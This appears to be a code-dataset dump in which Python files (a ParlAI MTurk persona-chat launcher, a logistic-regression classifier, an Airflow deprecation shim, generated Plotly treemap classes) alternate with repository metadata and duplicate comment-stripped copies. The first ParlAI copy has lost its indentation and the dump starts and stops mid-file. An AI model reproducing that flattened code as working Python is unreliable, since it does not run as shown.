worker.id = mturk_agent_ids[index % len(mturk_agent_ids)]
def run_conversation(mturk_manager, opt, workers):
agents = [workers[0], workers[1]]
conv_idx = mturk_manager.conversation_index
world = PersonaChatWorld(
opt=opt,
agents=agents,
range_turn=[int(s) for s in opt['range_turn'].split(',')],
max_turn=opt['max_turns'],
max_resp_time=opt['max_resp_time'],
world_tag='conversation t_{}'.format(conv_idx)
)
world.reset_random()
while not world.episode_done():
world.parley()
world.save_data()
world.shutdown()
world.review_work()
mturk_manager.start_task(
eligibility_function=check_worker_eligibility,
assign_role_function=assign_worker_roles,
task_function=run_conversation
)
except BaseException:
raise
finally:
mturk_manager.expire_all_unassigned_hits()
mturk_manager.shutdown()
if __name__ == '__main__':
main()
| 38.650794
| 150
| 0.626489
|
from parlai.core.params import ParlaiParser
from parlai.mturk.core.mturk_manager import MTurkManager
from worlds import \
PersonaChatWorld, PersonaProfileWorld, PersonasGenerator
from task_config import task_config
import os
def main():
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
argparser.add_argument('-min_t', '--min_turns', default=5, type=int,
help='minimum number of turns')
argparser.add_argument('-mt', '--max_turns', default=10, type=int,
help='maximal number of chat turns')
argparser.add_argument('-mx_rsp_time', '--max_resp_time', default=150,
type=int,
help='time limit for entering a dialog message')
argparser.add_argument('-mx_psn_time', '--max_persona_time', type=int,
default=300, help='time limit for turker'
'entering the persona')
argparser.add_argument('--ag_shutdown_time', default=120,
type=int,
help='time limit for entering a dialog message')
argparser.add_argument('--persona-type', default='both', type=str,
choices=['both', 'self', 'other'],
help='Which personas to load from personachat')
argparser.add_argument('--revised', default=False, type='bool',
help='Whether to use revised personas')
argparser.add_argument('-rt', '--range_turn', default='5,7',
help='sample range of number of turns')
argparser.add_argument('--personas-path', default=None,
help='specify path for personas data')
opt = argparser.parse_args()
directory_path = os.path.dirname(os.path.abspath(__file__))
opt['task'] = os.path.basename(directory_path)
if not opt.get('personas_path'):
opt['personas_path'] = argparser.parlai_home + '/parlai/mturk/personachat_chat/data'
opt.update(task_config)
opt['extract_personas_path'] = os.path.join(opt['datapath'], 'personachat_chat')
mturk_agent_ids = ['PERSON_1', 'PERSON_2']
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=mturk_agent_ids
)
persona_generator = PersonasGenerator(opt)
mturk_manager.setup_server(task_directory_path=directory_path)
try:
mturk_manager.start_new_run()
mturk_manager.create_hits()
if not opt['is_sandbox']:
blocked_worker_list = []
for w in blocked_worker_list:
mturk_manager.block_worker(w, 'We found that you have unexpected behaviors in our previous HITs. For more questions please email us.')
def run_onboard(worker):
worker.persona_generator = persona_generator
world = PersonaProfileWorld(opt, worker)
world.parley()
world.shutdown()
mturk_manager.set_onboard_function(onboard_function=run_onboard)
mturk_manager.ready_to_accept_workers()
def check_worker_eligibility(worker):
return True
def assign_worker_roles(workers):
for index, worker in enumerate(workers):
worker.id = mturk_agent_ids[index % len(mturk_agent_ids)]
def run_conversation(mturk_manager, opt, workers):
agents = [workers[0], workers[1]]
conv_idx = mturk_manager.conversation_index
world = PersonaChatWorld(
opt=opt,
agents=agents,
range_turn=[int(s) for s in opt['range_turn'].split(',')],
max_turn=opt['max_turns'],
max_resp_time=opt['max_resp_time'],
world_tag='conversation t_{}'.format(conv_idx)
)
world.reset_random()
while not world.episode_done():
world.parley()
world.save_data()
world.shutdown()
world.review_work()
mturk_manager.start_task(
eligibility_function=check_worker_eligibility,
assign_role_function=assign_worker_roles,
task_function=run_conversation
)
except BaseException:
raise
finally:
mturk_manager.expire_all_unassigned_hits()
mturk_manager.shutdown()
if __name__ == '__main__':
main()
| true
| true
|
f705343bf3fc1ba799d2ebee62971a89002e3bcf
| 2,523
|
py
|
Python
|
Ch_03/LogisticRegression.py
|
RafaelSouza94/Python_Machine_Learning
|
5b150613410ddc64a61690f232ec61751744fa41
|
[
"MIT"
] | null | null | null |
Ch_03/LogisticRegression.py
|
RafaelSouza94/Python_Machine_Learning
|
5b150613410ddc64a61690f232ec61751744fa41
|
[
"MIT"
] | null | null | null |
Ch_03/LogisticRegression.py
|
RafaelSouza94/Python_Machine_Learning
|
5b150613410ddc64a61690f232ec61751744fa41
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Logistic Regression Gradient Descent
"""
import numpy as np
class LogisticRegressionGD(object):
"""Logistic Regression Classifier using gradient descent.
Parameters
------------
eta : float
Learning rate (between 0.0 and 1.0)
n_iter : int
Passes over the training dataset.
random_state : int
Random number generator seed for random weight
initialization.
Attributes
-----------
w_ : 1d-array
Weights after fitting.
cost_ : list
Logistic cost function value in each epoch.
"""
def __init__(self, eta=0.05, n_iter=100, random_state=1):
self.eta = eta
self.n_iter = n_iter
self.random_state = random_state
def fit(self, X, y):
""" Fit training data.
Parameters
----------
X : {array-like}, shape = [n_examples, n_features]
Training vectors, where n_examples is the number of
examples and n_features is the number of features.
y : array-like, shape = [n_examples]
Target values.
Returns
-------
self : object
"""
rgen = np.random.RandomState(self.random_state)
self.w_ = rgen.normal(loc=0.0, scale=0.01,
size=1 + X.shape[1])
self.cost_ = []
for i in range(self.n_iter):
net_input = self.net_input(X)
output = self.activation(net_input)
errors = (y - output)
self.w_[1:] += self.eta * X.T.dot(errors)
self.w_[0] += self.eta * errors.sum()
# note that we compute the logistic `cost` now
# instead of the sum of squared errors cost
cost = (-y.dot(np.log(output)) -
((1 - y).dot(np.log(1 - output))))
self.cost_.append(cost)
return self
def net_input(self, X):
"""Calculate net input"""
return np.dot(X, self.w_[1:]) + self.w_[0]
def activation(self, z):
"""Compute logistic sigmoid activation"""
return 1. / (1. + np.exp(-np.clip(z, -250, 250)))
def predict(self, X):
"""Return class label after unit step"""
return np.where(self.net_input(X) >= 0.0, 1, 0)
# equivalent to:
# return np.where(self.activation(self.net_input(X))
# >= 0.5, 1, 0)
| 30.035714
| 63
| 0.52279
|
import numpy as np
class LogisticRegressionGD(object):
def __init__(self, eta=0.05, n_iter=100, random_state=1):
self.eta = eta
self.n_iter = n_iter
self.random_state = random_state
def fit(self, X, y):
rgen = np.random.RandomState(self.random_state)
self.w_ = rgen.normal(loc=0.0, scale=0.01,
size=1 + X.shape[1])
self.cost_ = []
for i in range(self.n_iter):
net_input = self.net_input(X)
output = self.activation(net_input)
errors = (y - output)
self.w_[1:] += self.eta * X.T.dot(errors)
self.w_[0] += self.eta * errors.sum()
cost = (-y.dot(np.log(output)) -
((1 - y).dot(np.log(1 - output))))
self.cost_.append(cost)
return self
def net_input(self, X):
return np.dot(X, self.w_[1:]) + self.w_[0]
def activation(self, z):
return 1. / (1. + np.exp(-np.clip(z, -250, 250)))
def predict(self, X):
return np.where(self.net_input(X) >= 0.0, 1, 0)
| true
| true
|
f705365fe4791c97b8b3d6bace419ef73911d813
| 1,149
|
py
|
Python
|
airflow/hooks/mysql_hook.py
|
dorranh/airflow
|
1a9a2cadcf8606cfcb729d1323dd33dfacc64633
|
[
"Apache-2.0"
] | 5
|
2020-07-17T07:33:58.000Z
|
2022-03-02T06:23:47.000Z
|
airflow/hooks/mysql_hook.py
|
dorranh/airflow
|
1a9a2cadcf8606cfcb729d1323dd33dfacc64633
|
[
"Apache-2.0"
] | 7
|
2020-06-03T14:55:17.000Z
|
2021-12-30T00:01:50.000Z
|
airflow/hooks/mysql_hook.py
|
dorranh/airflow
|
1a9a2cadcf8606cfcb729d1323dd33dfacc64633
|
[
"Apache-2.0"
] | 12
|
2020-01-09T14:02:39.000Z
|
2022-01-24T07:18:51.000Z
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module is deprecated. Please use `airflow.providers.mysql.hooks.mysql`."""
import warnings
# pylint: disable=unused-import
from airflow.providers.mysql.hooks.mysql import MySqlHook # noqa
warnings.warn(
"This module is deprecated. Please use `airflow.providers.mysql.hooks.mysql`.",
DeprecationWarning, stacklevel=2
)
| 38.3
| 83
| 0.761532
|
import warnings
from airflow.providers.mysql.hooks.mysql import MySqlHook
warnings.warn(
"This module is deprecated. Please use `airflow.providers.mysql.hooks.mysql`.",
DeprecationWarning, stacklevel=2
)
| true
| true
|
f705371ad450409a7a5a8779c94a8bb544f9b844
| 114,476
|
py
|
Python
|
pyInstaller/plotly/graph_objs/treemap/__init__.py
|
rianawillers/dash-lineplot
|
b72c3e4799d39bdc33bbcae2202fdefd6f4af00e
|
[
"MIT"
] | 2
|
2019-11-08T07:01:11.000Z
|
2019-11-17T10:10:49.000Z
|
pyInstaller/plotly/graph_objs/treemap/__init__.py
|
rianawillers/dash-lineplot
|
b72c3e4799d39bdc33bbcae2202fdefd6f4af00e
|
[
"MIT"
] | 12
|
2020-06-06T01:22:26.000Z
|
2022-03-12T00:13:42.000Z
|
pyInstaller/plotly/graph_objs/treemap/__init__.py
|
rianawillers/dash-lineplot
|
b72c3e4799d39bdc33bbcae2202fdefd6f4af00e
|
[
"MIT"
] | 17
|
2019-11-21T14:11:29.000Z
|
2019-11-21T15:26:23.000Z
|
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Tiling(_BaseTraceHierarchyType):
# flip
# ----
@property
def flip(self):
"""
Determines if the positions obtained from solver are flipped on
each axis.
The 'flip' property is a flaglist and may be specified
as a string containing:
- Any combination of ['x', 'y'] joined with '+' characters
(e.g. 'x+y')
Returns
-------
Any
"""
return self["flip"]
@flip.setter
def flip(self, val):
self["flip"] = val
# packing
# -------
@property
def packing(self):
"""
Determines d3 treemap solver. For more info please refer to
https://github.com/d3/d3-hierarchy#treemap-tiling
The 'packing' property is an enumeration that may be specified as:
- One of the following enumeration values:
['squarify', 'binary', 'dice', 'slice', 'slice-dice',
'dice-slice']
Returns
-------
Any
"""
return self["packing"]
@packing.setter
def packing(self, val):
self["packing"] = val
# pad
# ---
@property
def pad(self):
"""
Sets the inner padding (in px).
The 'pad' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["pad"]
@pad.setter
def pad(self, val):
self["pad"] = val
# squarifyratio
# -------------
@property
def squarifyratio(self):
"""
When using "squarify" `packing` algorithm, according to https:/
/github.com/d3/d3-hierarchy/blob/master/README.md#squarify_rati
o this option specifies the desired aspect ratio of the
generated rectangles. The ratio must be specified as a number
greater than or equal to one. Note that the orientation of the
generated rectangles (tall or wide) is not implied by the
ratio; for example, a ratio of two will attempt to produce a
mixture of rectangles whose width:height ratio is either 2:1 or
1:2. When using "squarify", unlike d3 which uses the Golden
Ratio i.e. 1.618034, Plotly applies 1 to increase squares in
treemap layouts.
The 'squarifyratio' property is a number and may be specified as:
- An int or float in the interval [1, inf]
Returns
-------
int|float
"""
return self["squarifyratio"]
@squarifyratio.setter
def squarifyratio(self, val):
self["squarifyratio"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
flip
Determines if the positions obtained from solver are
flipped on each axis.
packing
Determines d3 treemap solver. For more info please
refer to https://github.com/d3/d3-hierarchy#treemap-
tiling
pad
Sets the inner padding (in px).
squarifyratio
When using "squarify" `packing` algorithm, according to
https://github.com/d3/d3-hierarchy/blob/master/README.m
d#squarify_ratio this option specifies the desired
aspect ratio of the generated rectangles. The ratio
must be specified as a number greater than or equal to
one. Note that the orientation of the generated
rectangles (tall or wide) is not implied by the ratio;
for example, a ratio of two will attempt to produce a
mixture of rectangles whose width:height ratio is
either 2:1 or 1:2. When using "squarify", unlike d3
which uses the Golden Ratio i.e. 1.618034, Plotly
applies 1 to increase squares in treemap layouts.
"""
def __init__(
self, arg=None, flip=None, packing=None, pad=None, squarifyratio=None, **kwargs
):
"""
Construct a new Tiling object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Tiling
flip
Determines if the positions obtained from solver are
flipped on each axis.
packing
Determines d3 treemap solver. For more info please
refer to https://github.com/d3/d3-hierarchy#treemap-
tiling
pad
Sets the inner padding (in px).
squarifyratio
When using "squarify" `packing` algorithm, according to
https://github.com/d3/d3-hierarchy/blob/master/README.m
d#squarify_ratio this option specifies the desired
aspect ratio of the generated rectangles. The ratio
must be specified as a number greater than or equal to
one. Note that the orientation of the generated
rectangles (tall or wide) is not implied by the ratio;
for example, a ratio of two will attempt to produce a
mixture of rectangles whose width:height ratio is
either 2:1 or 1:2. When using "squarify", unlike d3
which uses the Golden Ratio i.e. 1.618034, Plotly
applies 1 to increase squares in treemap layouts.
Returns
-------
Tiling
"""
super(Tiling, self).__init__("tiling")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Tiling
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Tiling"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import tiling as v_tiling
# Initialize validators
# ---------------------
self._validators["flip"] = v_tiling.FlipValidator()
self._validators["packing"] = v_tiling.PackingValidator()
self._validators["pad"] = v_tiling.PadValidator()
self._validators["squarifyratio"] = v_tiling.SquarifyratioValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("flip", None)
self["flip"] = flip if flip is not None else _v
_v = arg.pop("packing", None)
self["packing"] = packing if packing is not None else _v
_v = arg.pop("pad", None)
self["pad"] = pad if pad is not None else _v
_v = arg.pop("squarifyratio", None)
self["squarifyratio"] = squarifyratio if squarifyratio is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Textfont(_BaseTraceHierarchyType):
# color
# -----
@property
def color(self):
"""
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# colorsrc
# --------
@property
def colorsrc(self):
"""
Sets the source reference on plot.ly for color .
The 'colorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["colorsrc"]
@colorsrc.setter
def colorsrc(self, val):
self["colorsrc"] = val
# family
# ------
@property
def family(self):
"""
HTML font family - the typeface that will be applied by the web
browser. The web browser will only be able to apply a font if
it is available on the system which it operates. Provide
multiple font families, separated by commas, to indicate the
preference in which to apply fonts if they aren't available on
the system. The plotly service (at https://plot.ly or on-
premise) generates images on a server, where only a select
number of fonts are installed and supported. These include
"Arial", "Balto", "Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old Standard TT", "Open
Sans", "Overpass", "PT Sans Narrow", "Raleway", "Times New
Roman".
The 'family' property is a string and must be specified as:
- A non-empty string
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
str|numpy.ndarray
"""
return self["family"]
@family.setter
def family(self, val):
self["family"] = val
# familysrc
# ---------
@property
def familysrc(self):
"""
Sets the source reference on plot.ly for family .
The 'familysrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["familysrc"]
@familysrc.setter
def familysrc(self, val):
self["familysrc"] = val
# size
# ----
@property
def size(self):
"""
The 'size' property is a number and may be specified as:
- An int or float in the interval [1, inf]
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
int|float|numpy.ndarray
"""
return self["size"]
@size.setter
def size(self, val):
self["size"] = val
# sizesrc
# -------
@property
def sizesrc(self):
"""
Sets the source reference on plot.ly for size .
The 'sizesrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["sizesrc"]
@sizesrc.setter
def sizesrc(self, val):
self["sizesrc"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
"""
def __init__(
self,
arg=None,
color=None,
colorsrc=None,
family=None,
familysrc=None,
size=None,
sizesrc=None,
**kwargs
):
"""
Construct a new Textfont object
Sets the font used for `textinfo`.
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Textfont
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
Returns
-------
Textfont
"""
super(Textfont, self).__init__("textfont")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Textfont
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Textfont"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import textfont as v_textfont
# Initialize validators
# ---------------------
self._validators["color"] = v_textfont.ColorValidator()
self._validators["colorsrc"] = v_textfont.ColorsrcValidator()
self._validators["family"] = v_textfont.FamilyValidator()
self._validators["familysrc"] = v_textfont.FamilysrcValidator()
self._validators["size"] = v_textfont.SizeValidator()
self._validators["sizesrc"] = v_textfont.SizesrcValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
self["color"] = color if color is not None else _v
_v = arg.pop("colorsrc", None)
self["colorsrc"] = colorsrc if colorsrc is not None else _v
_v = arg.pop("family", None)
self["family"] = family if family is not None else _v
_v = arg.pop("familysrc", None)
self["familysrc"] = familysrc if familysrc is not None else _v
_v = arg.pop("size", None)
self["size"] = size if size is not None else _v
_v = arg.pop("sizesrc", None)
self["sizesrc"] = sizesrc if sizesrc is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Stream(_BaseTraceHierarchyType):
# maxpoints
# ---------
@property
def maxpoints(self):
"""
Sets the maximum number of points to keep on the plots from an
incoming stream. If `maxpoints` is set to 50, only the newest
50 points will be displayed on the plot.
The 'maxpoints' property is a number and may be specified as:
- An int or float in the interval [0, 10000]
Returns
-------
int|float
"""
return self["maxpoints"]
@maxpoints.setter
def maxpoints(self, val):
self["maxpoints"] = val
# token
# -----
@property
def token(self):
"""
The stream id number links a data trace on a plot with a
stream. See https://plot.ly/settings for more details.
The 'token' property is a string and must be specified as:
- A non-empty string
Returns
-------
str
"""
return self["token"]
@token.setter
def token(self, val):
self["token"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
maxpoints
Sets the maximum number of points to keep on the plots
from an incoming stream. If `maxpoints` is set to 50,
only the newest 50 points will be displayed on the
plot.
token
The stream id number links a data trace on a plot with
a stream. See https://plot.ly/settings for more
details.
"""
def __init__(self, arg=None, maxpoints=None, token=None, **kwargs):
"""
Construct a new Stream object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Stream
maxpoints
Sets the maximum number of points to keep on the plots
from an incoming stream. If `maxpoints` is set to 50,
only the newest 50 points will be displayed on the
plot.
token
The stream id number links a data trace on a plot with
a stream. See https://plot.ly/settings for more
details.
Returns
-------
Stream
"""
super(Stream, self).__init__("stream")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Stream
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Stream"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import stream as v_stream
# Initialize validators
# ---------------------
self._validators["maxpoints"] = v_stream.MaxpointsValidator()
self._validators["token"] = v_stream.TokenValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("maxpoints", None)
self["maxpoints"] = maxpoints if maxpoints is not None else _v
_v = arg.pop("token", None)
self["token"] = token if token is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Pathbar(_BaseTraceHierarchyType):
# edgeshape
# ---------
@property
def edgeshape(self):
"""
Determines which shape is used for edges between `barpath`
labels.
The 'edgeshape' property is an enumeration that may be specified as:
- One of the following enumeration values:
['>', '<', '|', '\\']
- A string that matches one of the following regular expressions:
['']
Returns
-------
Any
"""
return self["edgeshape"]
@edgeshape.setter
def edgeshape(self, val):
self["edgeshape"] = val
# side
# ----
@property
def side(self):
"""
Determines on which side of the the treemap the `pathbar`
should be presented.
The 'side' property is an enumeration that may be specified as:
- One of the following enumeration values:
['top', 'bottom']
Returns
-------
Any
"""
return self["side"]
@side.setter
def side(self, val):
self["side"] = val
# textfont
# --------
@property
def textfont(self):
"""
Sets the font used inside `pathbar`.
The 'textfont' property is an instance of Textfont
that may be specified as:
- An instance of plotly.graph_objs.treemap.pathbar.Textfont
- A dict of string/value properties that will be passed
to the Textfont constructor
Supported dict properties:
color
colorsrc
Sets the source reference on plot.ly for color
.
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The plotly service (at https://plot.ly
or on-premise) generates images on a server,
where only a select number of fonts are
installed and supported. These include "Arial",
"Balto", "Courier New", "Droid Sans",, "Droid
Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for
family .
size
sizesrc
Sets the source reference on plot.ly for size
.
Returns
-------
plotly.graph_objs.treemap.pathbar.Textfont
"""
return self["textfont"]
@textfont.setter
def textfont(self, val):
self["textfont"] = val
# thickness
# ---------
@property
def thickness(self):
"""
Sets the thickness of `pathbar` (in px). If not specified the
`pathbar.textfont.size` is used with 3 pixles extra padding on
each side.
The 'thickness' property is a number and may be specified as:
- An int or float in the interval [12, inf]
Returns
-------
int|float
"""
return self["thickness"]
@thickness.setter
def thickness(self, val):
self["thickness"] = val
# visible
# -------
@property
def visible(self):
"""
Determines if the path bar is drawn i.e. outside the trace
`domain` and with one pixel gap.
The 'visible' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["visible"]
@visible.setter
def visible(self, val):
self["visible"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
edgeshape
Determines which shape is used for edges between
`barpath` labels.
side
Determines on which side of the the treemap the
`pathbar` should be presented.
textfont
Sets the font used inside `pathbar`.
thickness
Sets the thickness of `pathbar` (in px). If not
specified the `pathbar.textfont.size` is used with 3
pixles extra padding on each side.
visible
Determines if the path bar is drawn i.e. outside the
trace `domain` and with one pixel gap.
"""
    def __init__(
        self,
        arg=None,
        edgeshape=None,
        side=None,
        textfont=None,
        thickness=None,
        visible=None,
        **kwargs
    ):
        """
        Construct a new Pathbar object

        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of plotly.graph_objs.treemap.Pathbar
        edgeshape
            Determines which shape is used for edges between
            `barpath` labels.
        side
            Determines on which side of the treemap the
            `pathbar` should be presented.
        textfont
            Sets the font used inside `pathbar`.
        thickness
            Sets the thickness of `pathbar` (in px). If not
            specified the `pathbar.textfont.size` is used with 3
            pixels extra padding on each side.
        visible
            Determines if the path bar is drawn i.e. outside the
            trace `domain` and with one pixel gap.

        Returns
        -------
        Pathbar
        """
        super(Pathbar, self).__init__("pathbar")
        # Validate arg
        # ------------
        # `arg` may be a dict or another Pathbar; either way it is copied
        # so the caller's object is never mutated by the pops below.
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.treemap.Pathbar
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Pathbar"""
            )
        # Handle skip_invalid
        # -------------------
        # When True, invalid properties are silently dropped instead of
        # raising (used when ingesting possibly-stale figure JSON).
        self._skip_invalid = kwargs.pop("skip_invalid", False)
        # Import validators
        # -----------------
        from plotly.validators.treemap import pathbar as v_pathbar
        # Initialize validators
        # ---------------------
        self._validators["edgeshape"] = v_pathbar.EdgeshapeValidator()
        self._validators["side"] = v_pathbar.SideValidator()
        self._validators["textfont"] = v_pathbar.TextfontValidator()
        self._validators["thickness"] = v_pathbar.ThicknessValidator()
        self._validators["visible"] = v_pathbar.VisibleValidator()
        # Populate data dict with properties
        # ----------------------------------
        # Explicit keyword arguments take precedence over values in `arg`.
        _v = arg.pop("edgeshape", None)
        self["edgeshape"] = edgeshape if edgeshape is not None else _v
        _v = arg.pop("side", None)
        self["side"] = side if side is not None else _v
        _v = arg.pop("textfont", None)
        self["textfont"] = textfont if textfont is not None else _v
        _v = arg.pop("thickness", None)
        self["thickness"] = thickness if thickness is not None else _v
        _v = arg.pop("visible", None)
        self["visible"] = visible if visible is not None else _v
        # Process unknown kwargs
        # ----------------------
        # Remaining entries of `arg` plus any extra **kwargs are handed to
        # the base class (which applies skip_invalid semantics).
        self._process_kwargs(**dict(arg, **kwargs))
        # Reset skip_invalid
        # ------------------
        self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Outsidetextfont(_BaseTraceHierarchyType):
    """Sets the font used for `textinfo` lying outside the sector.

    Generated wrapper for the treemap `outsidetextfont` attribute. Each
    property stores its value through the base class item-assignment.
    NOTE(review): fixed a duplicated comma (``"Droid Sans",,``) in the
    generated font-family descriptions.
    """

    # color
    # -----
    @property
    def color(self):
        """
        The 'color' property is a color and may be specified as:
          - A hex string (e.g. '#ff0000')
          - An rgb/rgba string (e.g. 'rgb(255,0,0)')
